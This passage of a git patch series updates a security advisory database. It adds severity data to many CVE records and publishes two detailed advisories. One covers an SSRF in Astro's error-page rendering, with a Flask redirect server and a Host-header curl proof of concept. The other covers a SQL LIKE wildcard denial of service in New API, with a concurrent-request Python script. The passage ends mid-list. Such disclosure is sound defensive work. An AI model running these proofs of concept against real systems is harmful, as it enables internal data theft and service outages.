diff --git a/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json b/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json index 5eedab98e0b85..8d350bb062554 100644 --- a/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json +++ b/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pfgm-6983-f589", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2025-70831" ], "details": "A Remote Code Execution (RCE) vulnerability was found in Smanga 3.2.7 in the /php/path/rescan.php interface. The application fails to properly sanitize user-supplied input in the mediaId parameter before using it in a system shell command. This allows an unauthenticated attacker to inject arbitrary operating system commands, leading to complete server compromise.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:29Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pfjc-cfqc-87f5/GHSA-pfjc-cfqc-87f5.json b/advisories/unreviewed/2026/02/GHSA-pfjc-cfqc-87f5/GHSA-pfjc-cfqc-87f5.json new file mode 100644 index 0000000000000..3e8d2e8faf862 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pfjc-cfqc-87f5/GHSA-pfjc-cfqc-87f5.json 
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pfjc-cfqc-87f5",
+ "modified": "2026-02-23T21:31:28Z",
+ "published": "2026-02-23T21:31:27Z",
+ "aliases": [
+ "CVE-2026-3025"
+ ],
+ "details": "A flaw has been found in ShuoRen Smart Heating Integrated Management Platform 1.0.0. Affected by this vulnerability is an unknown functionality of the file /MP/Service/Webservice/ExampleNodeService.asmx. Executing a manipulation of the argument File can lead to unrestricted upload. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3025"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347381"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347381"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756376"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T21:19:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json b/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json
index d54576b1272d0..731ba31ff35ea 100644
--- a/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json
+++ b/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json
@@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json b/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json index 692cea57e14ed..6ae3450414114 100644 --- a/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json +++ b/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-q8wg-gw6g-8c93", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2025-70833" ], "details": "An Authentication Bypass vulnerability in Smanga 3.2.7 allows an unauthenticated attacker to reset the password of any user (including the administrator) and fully takeover the account by manipulating POST parameters. The issue stems from insecure permission validation in check-power.php.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:50Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qg32-r7gw-fcxw/GHSA-qg32-r7gw-fcxw.json b/advisories/unreviewed/2026/02/GHSA-qg32-r7gw-fcxw/GHSA-qg32-r7gw-fcxw.json new file mode 100644 index 0000000000000..c650c5a6794ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qg32-r7gw-fcxw/GHSA-qg32-r7gw-fcxw.json 
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qg32-r7gw-fcxw",
+ "modified": "2026-02-23T21:31:28Z",
+ "published": "2026-02-23T21:31:28Z",
+ "aliases": [
+ "CVE-2026-3027"
+ ],
+ "details": "A vulnerability was found in erzhongxmu JEEWMS up to 3.7. This affects an unknown part of the file src/main/webapp/plug-in/ueditor/jsp/getContent.jsp of the component UEditor. The manipulation of the argument myEditor results in cross site scripting. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3027"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347383"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347383"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756523"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.notion.so/JEEWMS-Reflected-XSS-Vulnerability-in-UEditor-Module-304ea92a3c41806a97ffc9b707f2fbf0"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T21:19:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json b/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json
index 2a3fa7b421b2c..baa3077e9978b 100644
--- a/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json
+++ b/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qqj5-wp73-78fr", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69393" ], "details": "Missing Authorization vulnerability in Jthemes Exzo exzo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Exzo: from n/a through <= 1.2.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-r222-jjm5-r49x/GHSA-r222-jjm5-r49x.json b/advisories/unreviewed/2026/02/GHSA-r222-jjm5-r49x/GHSA-r222-jjm5-r49x.json new file mode 100644 index 0000000000000..55cdaad79f1b5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r222-jjm5-r49x/GHSA-r222-jjm5-r49x.json 
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r222-jjm5-r49x",
+ "modified": "2026-02-23T21:31:28Z",
+ "published": "2026-02-23T21:31:28Z",
+ "aliases": [
+ "CVE-2026-3075"
+ ],
+ "details": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Jeff Starr Simple Ajax Chat simple-ajax-chat allows Retrieve Embedded Sensitive Data.This issue affects Simple Ajax Chat: from n/a through <= 20251121.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3075"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/simple-ajax-chat/vulnerability/wordpress-simple-ajax-chat-plugin-20251121-sensitive-data-exposure-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-497"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T21:19:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json
index c293e49d3b5a5..91cd454a1ccae 100644
--- a/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json
+++ b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r4m5-gc42-8vvh", - "modified": "2026-02-20T00:31:53Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T00:31:53Z", "aliases": [ "CVE-2025-8055" ], "details": "Server-Side Request Forgery (SSRF) vulnerability in OpenText™ XM Fax allows Server Side Request Forgery. \n\nThe vulnerability could allow an attacker to\n\n\n\nperform blind SSRF to other systems accessible from the XM Fax server.\n\nThis issue affects XM Fax: 24.2.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:D/RE:M/U:Amber" diff --git a/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json b/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json index 402424f7c9e0e..cf7d7e34d2389 100644 --- a/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json +++ b/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rp93-gq4p-8r62", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26724" ], "details": "Cross Site Scripting vulnerability in Key Systems Inc Global Facilities Management Software v. 20230721a allows a remote attacker to execute arbitrary code via the selectgroup and gn parameters on the /?Function=Groups endpoint.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" + } + ], "affected": [], "references": [ { 
@@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json b/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json index 44893b54091aa..9584260a11bb2 100644 --- a/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json +++ b/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vq94-wmm9-737m", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T21:31:22Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2025-15560" ], "details": "An authenticated attacker with minimal permissions can exploit a SQL injection in the WorkTime server \"widget\" API endpoint to inject SQL queries. If the Firebird backend is used, attackers are able to retrieve all data from the database backend. If the MSSQL backend is used the attacker can execute arbitrary SQL statements on the database backend and gain access to sensitive data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T11:15:56Z" diff --git a/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json b/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json index e9d68aa6beda3..dd1fb079a72a8 100644 --- a/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json +++ b/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-w2hw-vq92-cm3x", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69380" ], "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish Upload Files Anywhere wp-upload-files-anywhere allows Path Traversal.This issue affects Upload Files Anywhere: from n/a through <= 2.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-22" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:22Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json b/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json index 6968fdd26c4e3..e0ccd5ccbe41a 100644 --- a/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json +++ b/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wqcv-67x3-mx26", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-24956" ], "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Shahjada Download Manager Addons for Elementor wpdm-elementor allows Blind SQL Injection.This issue affects Download Manager Addons for Elementor: from n/a through <= 1.3.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L" + } + ], "affected": [], "references": [ { 
@@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:39Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json b/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json index 3bc08b8a5eb03..71360b001f9bd 100644 --- a/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json +++ b/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xf4f-qj26-72pf", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:24Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26747" ], "details": "A Host Header Poisoning vulnerability exists in Monica 4.1.2 due to improper handling of the HTTP Host header in app/Providers/AppServiceProvider.php, combined with the default misconfiguration where the \"app.force_url\" is not set and default is \"false\". The application generates absolute URLs (such as those used in password reset emails) using the user-supplied Host header. This allows remote attackers to poison the password reset link sent to a victim,", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-644" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:56Z" From 86cca5d275a1efd1af9e349fe776b8f61c9227d2 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 21:55:47 +0000 Subject: [PATCH 56/77] Publish GHSA-qq67-mvv5-fw3g --- .../GHSA-qq67-mvv5-fw3g.json | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-qq67-mvv5-fw3g/GHSA-qq67-mvv5-fw3g.json diff --git a/advisories/github-reviewed/2026/02/GHSA-qq67-mvv5-fw3g/GHSA-qq67-mvv5-fw3g.json b/advisories/github-reviewed/2026/02/GHSA-qq67-mvv5-fw3g/GHSA-qq67-mvv5-fw3g.json new file mode 100644 index 0000000000000..9216f9bc871a0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-qq67-mvv5-fw3g/GHSA-qq67-mvv5-fw3g.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq67-mvv5-fw3g", + "modified": "2026-02-23T21:54:32Z", + "published": "2026-02-23T21:54:32Z", + "aliases": [ + "CVE-2026-25545" + ], + "summary": "Astro has Full-Read SSRF in error rendering via Host: header injection", + "details": "### Summary\n\nServer-Side Rendered pages that return an error with a prerendered custom error page (eg. `404.astro` or `500.astro`) are vulnerable to SSRF. If the `Host:` header is changed to an attacker's server, it will be fetched on `/500.html` and they can redirect this to any internal URL to read the response body through the first request.\n\n### Details\n\nThe following line of code fetches `statusURL` and returns the response back to the client:\n\nhttps://github.com/withastro/astro/blob/bf0b4bfc7439ddc565f61a62037880e4e701eb05/packages/astro/src/core/app/base.ts#L534\n\n`statusURL` comes from `this.baseWithoutTrailingSlash`, which [is built from the `Host:` header](https://github.com/withastro/astro/blob/e5e3208ee5041ad9cccd479c29a34bf6183a6505/packages/astro/src/core/app/node.ts#L81). `prerenderedErrorPageFetch()` is just `fetch()`, and **follows redirects**. This makes it possible for an attacker to set the `Host:` header to their server (eg. `Host: attacker.tld`), and if the server still receives the request without normalization, Astro will now fetch `http://attacker.tld/500.html`.\n\nThe attacker can then redirect this request to http://localhost:8000/ssrf.txt, for example, to fetch any locally listening service. The response code is not checked, because as the comment in the code explains, this fetch may give a 200 OK. The body and headers are returned back to the attacker.\n\nLooking at the vulnerable code, the way to reach this is if the `renderError()` function is called (error response during SSR) and the error page is prerendered (custom `500.astro` error page). 
The PoC below shows how a basic project with these requirements can be set up.\n\n**Note**: Another common vulnerable pattern for `404.astro` we saw is:\n\n```astro\nreturn new Response(null, {status: 404});\n```\n\nAlso, it does not matter what `allowedDomains` is set to, since it only checks the `X-Forwarded-Host:` header.\n\nhttps://github.com/withastro/astro/blob/9e16d63cdd2537c406e50d005b389ac115755e8e/packages/astro/src/core/app/base.ts#L146\n\n### PoC\n\n1. Create a new empty project\n\n```bash\nnpm create astro@latest poc -- --template minimal --install --no-git --yes\n```\n\n2. Create `poc/src/pages/error.astro` which throws an error with SSR:\n\n```astro\n---\nexport const prerender = false;\n\nthrow new Error(\"Test\")\n---\n```\n\n3. Create `poc/src/pages/500.astro` with any content like:\n\n```astro\n

500 Internal Server Error

\n```\n\n4. Build and run the app\n\n```bash\ncd poc\nnpx astro add node --yes\nnpm run build && npm run preview\n```\n\n5. Set up an \"internal server\" which we will SSRF to. Create a file called `ssrf.txt` and host it locally on http://localhost:8000:\n\n```bash\ncd $(mktemp -d)\necho \"SECRET CONTENT\" > ssrf.txt\npython3 -m http.server\n```\n\n6. Set up attacker's server with exploit code and run it, so that its server becomes available on http://localhost:5000:\n\n```python\n# pip install Flask\nfrom flask import Flask, redirect\n\napp = Flask(__name__)\n\n@app.route(\"/500.html\")\ndef exploit():\n return redirect(\"http://127.0.0.1:8000/ssrf.txt\")\n\nif __name__ == \"__main__\":\n app.run()\n```\n\n7. Send the following request to the server, and notice the 500 error returns \"SECRET CONTENT\".\n\n```shell\n$ curl -i http://localhost:4321/error -H 'Host: localhost:5000'\nHTTP/1.1 500 OK\ncontent-type: text/plain\ndate: Tue, 03 Feb 2026 09:51:28 GMT\nlast-modified: Tue, 03 Feb 2026 09:51:09 GMT\nserver: SimpleHTTP/0.6 Python/3.12.3\nConnection: keep-alive\nKeep-Alive: timeout=5\nTransfer-Encoding: chunked\n\nSECRET CONTENT\n```\n\n### Impact\n\nAn attacker who can access the application without `Host:` header validation (eg. through finding the origin IP behind a proxy, or just by default) can fetch their own server to redirect to any internal IP. 
With this they can fetch cloud metadata IPs and interact with services in the internal network or localhost.\n\nFor this to be vulnerable, [a common feature](https://docs.astro.build/en/basics/astro-pages/#custom-500-error-page) needs to be used, with direct access to the server (no proxies).", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@astrojs/node" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "9.5.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g" + }, + { + "type": "WEB", + "url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9" + }, + { + "type": "PACKAGE", + "url": "https://github.com/withastro/astro" + }, + { + "type": "WEB", + "url": "https://github.com/withastro/astro/releases/tag/%40astrojs%2Fnode%409.5.4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T21:54:32Z", + "nvd_published_at": null + } +} \ No newline at end of file From e323cf2f85b1d5f620a041d606e09cd31c630584 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 21:58:10 +0000 Subject: [PATCH 57/77] Publish GHSA-w6x6-9fp7-fqm4 --- .../GHSA-w6x6-9fp7-fqm4.json | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-w6x6-9fp7-fqm4/GHSA-w6x6-9fp7-fqm4.json diff --git a/advisories/github-reviewed/2026/02/GHSA-w6x6-9fp7-fqm4/GHSA-w6x6-9fp7-fqm4.json b/advisories/github-reviewed/2026/02/GHSA-w6x6-9fp7-fqm4/GHSA-w6x6-9fp7-fqm4.json new file mode 100644 index 0000000000000..02703010ba9ea --- /dev/null 
+++ b/advisories/github-reviewed/2026/02/GHSA-w6x6-9fp7-fqm4/GHSA-w6x6-9fp7-fqm4.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6x6-9fp7-fqm4", + "modified": "2026-02-23T21:56:47Z", + "published": "2026-02-23T21:56:47Z", + "aliases": [ + "CVE-2026-25591" + ], + "summary": "New API has an SQL LIKE Wildcard Injection DoS via Token Search", + "details": "### Summary\nA SQL LIKE wildcard injection vulnerability in the `/api/token/search` endpoint allows authenticated users to cause Denial of Service through resource exhaustion by crafting malicious search patterns.\n\n### Details\nThe token search endpoint accepts user-supplied `keyword` and `token` parameters that are directly concatenated into SQL LIKE clauses without escaping wildcard characters (`%`, `_`). This allows attackers to inject patterns that trigger expensive database queries.\n\n### Vulnerable Code\nFile: `model/token.go:70`\n```go\nerr = DB.Where(\"user_id = ?\", userId).\n Where(\"name LIKE ?\", \"%\"+keyword+\"%\"). // No wildcard escaping\n Where(commonKeyCol+\" LIKE ?\", \"%\"+token+\"%\").\n Find(&tokens).Error\n```\n\n### PoC\n\nAfter creating over 2 million tokens, creating millions token entries is not difficult, because the rate limiting only applies to IP addresses, so multiple IP addresses can share one session, allowing for the creation of an unlimited number of tokens in batches.\n\n\"image\"\n\nThese data are not all loaded at once under normal circumstances, as shown in the image, and are displayed correctly. But if a request like this is submitted:\n\n```bash\n# A single request causes PostgreSQL to unconditionally retrieve all tokens belonging to that user. 
These requests buffer will all go into the buffer zone, causing an overflow and preventing the program from functioning properly.\ncurl 'http://localhost:3000/api/token/search?keyword=%&token='\n```\n\n\"image\"\n\nIt will cause DoS.\n\n```python\nimport requests\nfrom concurrent.futures import ThreadPoolExecutor\n\ndef attack(session_cookie):\n requests.get(\n 'http://localhost:3000/api/token/search',\n params={'keyword': '%_%_%_%_%_%', 'token': ''},\n cookies={'session': session_cookie},\n headers={'New-API-User': '1'}\n )\n\n# Launch 50 concurrent malicious requests\nwith ThreadPoolExecutor(max_workers=50) as executor:\n for _ in range(50):\n executor.submit(attack, '')\n```\n\n### Impact\n**Availability**\n\nRAM Overflow\n\n\"image\"\n\nPostgres unavailable\n\n\"image\"\n\n- Database CPU usage spike to 100%\n- Application memory exhaustion\n- Legitimate user requests blocked or significantly delayed\n- Potential application crash or database connection pool exhaustion\n\n### Database Performance\n\nTesting with 2,000,000 tokens:\n\n| Pattern | Query Time | Rows | Impact |\n|---------|-----------|------|--------|\n| `test` (normal) | ~50ms | 0 | Low |\n| `%` (full scan) | 5,973ms | 2,000,000 | High |\n| `%_%_%_%_%_%` | 6,200ms+ | 2,000,000 | Very High |\n\n### Attack Scalability\n\n- **Single attacker**: Can launch 10-50 concurrent requests easily\n- **Multiple accounts**: Attacker can register multiple accounts (if registration enabled)\n- **Proxy rotation**: IP-based rate limiting can be bypassed\n- **Persistence**: Attack can be sustained indefinitely\n\n### Resource Consumption\n\nEach malicious request with 2M results:\n- **Database**: ~6 seconds CPU time\n- **Network**: ~200MB data transfer\n- **Application Memory**: ~200MB+ for JSON serialization\n- **Connection Time**: Database connection held for entire query duration\n\n## Exploitation Scenario\n\n1. Attacker registers or compromises a regular user account\n2. 
